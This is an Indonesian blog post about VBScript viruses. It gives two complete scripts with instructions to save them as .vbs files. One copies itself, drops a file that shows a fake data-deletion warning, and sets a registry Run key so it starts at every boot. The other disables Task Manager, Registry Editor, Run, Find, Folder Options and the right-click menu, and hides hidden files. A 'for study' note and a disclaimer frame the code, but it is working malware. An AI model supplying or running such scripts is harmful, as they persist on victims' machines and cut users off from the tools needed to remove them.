Friday, January 13, 2012

Tentang Virus VBS



Akhir" ni ane agak terobsesi ma yang namanya virus. jadi pengen bahas virus nih, setahu ane, virus paling sederhana tu ya virus vbscript? apa ya virus vbscript tu?
setau ane vbscript tuh virus yang:
  • berupa file berakhiran [dot]vbs
  • dibuat dengan bahasa BASIC
  • standarnya, dijalankan oleh wscript.exe di sistem berbasis windows
  • virus yang 'menggantikan' virus BAT, file dengan ekstensi [dot]bat. yaitu virus dengan orientasi batch. berarti pengerjaan instruksi program secara batch (satu-satu) tidak ada yang prosedural.
  • virus yang 'ngetrend' karena ulah Onel de Gusman (Philipina) membuat virus VBS/LoveLetter-nya atau virus I Love You
  • Makin 'ngetrend' lagi setelah virus maker-virus maker indonesia membuat virus VBS/Melissa, yang sempat menyebar luas. Dan juga virus VBS/Mella yang dideteksi oleh AntiVirus dengan nama palindromnya: "VBS/alleM"
setelah melihat ciri-ciri vbs diatas,
ane pengen menyampaikan sesuatu tentang "Apa itu Virus"
  • Istilah virus diadopsi dari istilah biologi. virus dalam biologi pasti tau...
  • dapat "berkembang biak" sendiri
  • dapat "menginfeksi" atau "menumpang" ke file lain dengan cara mengisi awal, tengah, atau akhir dari struktur file korban dengan bit-bit virus. masih ingat Kspool? atau beberapa AV menyebutnya BackDoor? virus tersebut "menumpang" pada file [dot]doc, dll
  • virus yang "baik" adalah virus yang dapat "membela diri". bisa saja dengan cara menyembunyikan file virus, sampai menutup Task Manager, Regedit, dsb...
  • Virus komputer itu LOGIC, dan hasil dari pikiran manusia yang tidak bertanggung jawab. virus bukan berbentuk "fisik" seperti virus Biologi. jadi jangan takut dengan komp yang terkena virus, apalagi sampai menggunakan masker segala , hehehehehehe :)
Ini ane berikan contoh script file vbs yg sederhana (UNTUK DIPELAJARI) jangan disalah gunakan ya?
copy semua script dibawah ini ke notepad. trus save dengan ekstensi *.vbs

set fso=createobject("scripting.filesystemobject")
'buat file system object peng-handle file
set reg=createobject("wscript.shell")
'reg sbg paramater untuk mengeksekusi script
set file=fso.getfile(wscript.scriptfullname)
'fso digunakan, untuk mengambil file .vbs yang di-klik
file.copy "D:\sincan.vbs"
'var file di-copy ke drive D. virus mulai nyebar =P
set nfile=fso.createtextfile("c:/kucing.vbs")
'fso digunakan lagi, untuk membuat file baru di C, bernama kucing.vbs
nfile.write "msgbox" &chr(100) &"Anda telah mengaktifkan virus dalam komputer ini, jangan panik atau setres, karena data anda akan segera dihapus :) " &chr(100)
'file kucing.vbs di tulisi script oleh file yang scriptnya sedang anda baca ini
reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kucing","c:\kucing.vbs"
'menulis registry, agar file virus dieksekusi otomatis oleh windows saat startup

Ada yg bingung? pelajari dulu. nantinya, kalau sudah di-klik, akan ada file bernama kucing.vbs di drive C anda. Coba kucing.vbs di klik, maka akan muncul msgbox dengan pesan " Anda telah mengaktifkan virus dalam komputer ini, jangan panik atau setres, karena data anda akan segera dihapus :) ". message box itu akan selalu muncul ketika windows anda dijalankan. Coba anda bayangkan jika kucing.vbs berisi script yang memerintahkan komp anda untuk shutdown? maka komp anda akan shutdown selamanya ketika PC dijalankan :)

 ini ada script lagi buat dipelajari:

On Error Resume Next
‘kode ini berfungsi untuk meneruskan ke kode berikutnya jika terjadi Error. Ini sering digunakan oleh para pembuat virus.
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"
 ‘ berfungsi untuk mendisable "Registry Editor" dan "Task Manager"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"
‘ Ini digunakan untuk menghilangkan menu "Folder Options", "Run", dan "Find"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
‘ Berfungsi untuk tidak menampilkan menu Klik Kanan.

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"
‘ Tidak menampilkan "File Hidden" pada "Explorer"



maka akan tercipta script seperti berikut ini:

On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"

Kemudian simpan dengan jenis vbs (*.vbs)
Caranya: klik File, pilih Save As, pada File Name ketik "Virus.vbs" (tanpa tanda petik), kemudian klik Save.
Selesai. . .

*) SEGALA APA YANG TERJADI PADA KOMPUTER ANDA, ANDA SENDIRI YANG BERTANGGUNG JAWAB,….

Previous Post
Next Post

3 comments:

  1. Have used AVG security for a few years now, I'd recommend this anti virus to all you.

    ReplyDelete
  2. keren artikelnya informasi lengkap VBS Allem ada di http://143.127.10.117/security_response/writeup.jsp?docid=2005-030216-1808-99

    ReplyDelete
  3. bagus artikelnya mas, untuk info VBS.Allem@mm detailnya di http://143.127.10.117/security_response/writeup.jsp?docid=2005-030216-1808-99

    ReplyDelete

"Kalau mau Copy-Paste artikel boleh saja, tapi sumbernya ke blog ini"